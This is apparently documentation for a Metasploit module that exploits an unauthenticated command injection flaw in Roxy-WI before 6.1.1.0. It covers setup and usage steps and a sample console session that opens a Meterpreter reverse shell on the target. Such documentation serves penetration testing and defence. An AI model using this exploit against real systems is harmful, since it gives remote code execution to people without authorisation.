## Vulnerable Application This module exploits an unauthenticated command injection vulnerability in Roxy-WI prior to version 6.1.1.0. Successful exploitation results in remote code execution under the context of the web server user. ### Setup Roxy-WI requires Python and a web server to run. Please visit following url to find out required python and other packages. https://roxy-wi.org/installation.py#manual ``` git clone https://github.com/hap-wi/roxy-wi.git /var/www/haproxy-wi chmod +x haproxy-wi/app/*.py sudo ./haproxy-wi/app/create_db.py chown -R www-data:www-data haproxy-wi ``` ## Verification Steps 1. Install the application 2. Start msfconsole 3. Do: `use exploit/linux/http/roxy_wi_exec` 4. Set `RHOST` to the address of the target Roxy-WI machine. 5. Set `LHOST` to the address of your attacking machine. 8. Run `exploit` 9. Do: `run` 10. You should get a shell as the user running the Roxy-WI server. ## Targets ### 0 This executes a Unix command. ### 1 This uses a Linux dropper to execute code. ## Options ### TARGETURI Set `TARGETURI` if the Roxy-WI is installed at a custom path. ## Scenarios ### Roxy-WI 6.1.1.0 Ubuntu 20.04 GNU/Linux (x86_64) ``` Apache/2.4.52 MySQL 8.0.29 Python 3.10.4 ``` ``` msf6 > use exploit/linux/http/roxy_wi_exec [*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp msf6 exploit(linux/http/roxy_wi_exec) > set RHOST 192.168.56.116 RHOST => 192.168.56.116 msf6 exploit(linux/http/roxy_wi_exec) > set LHOST 192.168.56.1 LHOST => 192.168.56.1 msf6 exploit(linux/http/roxy_wi_exec) > set RPORT 443 RPORT => 443 msf6 exploit(linux/http/roxy_wi_exec) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Running automatic check ("set AutoCheck false" to disable) [+] The target is vulnerable. The device responded to exploitation with a 200 OK and test command successfully executed. [*] Executing Automatic for cmd/unix/python/meterpreter/reverse_tcp [*] Sending stage (40168 bytes) to 192.168.56.116 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.116:56156) at 2022-07-25 18:49:54 +0300 meterpreter > ```